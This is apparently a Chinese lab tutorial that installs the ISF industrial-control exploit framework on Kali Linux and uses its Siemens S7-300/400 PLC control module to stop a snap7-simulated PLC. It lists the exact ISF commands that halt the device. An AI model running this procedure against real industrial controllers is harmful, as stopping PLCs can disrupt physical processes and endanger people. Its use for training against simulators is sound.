目录
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境2.kali中安装工控漏洞利用框架 ISF(1)在kali终端中使用命令:编辑
B.进入python-nmap文件夹:cd python-nmap,使用命令python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
D.回到上一级文件夹,继续执行 python2 isf.py命令进行安装
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).使用serverdemo.exe模拟PLC设备,用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中编辑
4.打开ISF后,输入:use exploits/plcs/siemens/s7_300_400_plc_control
5.show options6.set target 物理机IP
7.run这里显示 stop plc ,同时查看serverdemo.exe模拟器中的输出,可以发现已经停止
一、前言
西门子S7-300是一种可编程逻辑控制器(PLC),由西门子公司设计和生产。它是S7系列控制器的一部分,S7-300系列是西门子S7系列中的中级产品。
西门子S7-300具有高性能和可靠性,适用于各种自动化应用。它可以通过编程来控制和监控机器、设备和工业过程。S7-300 PLC可以处理复杂的控制任务,具有灵活的输入/输出(I/O)配置,可支持多种通信接口和网络连接。
S7-300具有良好的可靠性和稳定性,能够在恶劣的工业环境中运行。它具有强大的数据处理能力和快速的响应速度,能够满足各种复杂控制需求。
总之,西门子S7-300是一款功能强大、可靠性高的模块化可编程控制器,广泛应用于工业自动化领域。
二、实验步骤
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
2.kali中安装工控漏洞利用框架 ISF
(1)在kali终端中使用命令:
git clone https://github.com/dark-lbp/isf/
(2)输入cd isf
(3)输入python2 isf.py
(4)这时有可能会报错:缺少nmap模块,方法:
A.克隆下载nmap模块的包
git clone GitHub - johanlundberg/python-nmap: Clone of https://bitbucket.org/xael/python-nmap
B.进入python-nmap文件夹:cd python-nmap,使用命令python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
D.回到上一级文件夹,继续执行 python2 isf.py命令进行安装
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).使用serverdemo.exe模拟PLC设备,用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
(3)可以查看到serverdemo.exe下面日志就显示server started
(4) 使用clientdemo.exe模拟主机,clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
4.打开ISF后,输入:
use exploits/plcs/siemens/s7_300_400_plc_control
5.show options
6.set target 物理机IP
7.run
这里显示 stop plc ,同时查看serverdemo.exe模拟器中的输出,可以发现已经停止
三、 结语
通过本次实验,我们对西门子S7-300 PLC的启动和停止功能有了深入的了解。 通过实验,我们发现西门子S7-300 PLC具有高度可靠性和稳定性。它的快速响应速度和精确的控制能力使其成为工业自动化的重要设备之一。总的来说,本次实验对我们深入了解西门子S7-300 PLC的启动和停止功能起到了很大的帮助。我们将通过进一步学习和实践,不断提高自己在PLC控制方面的能力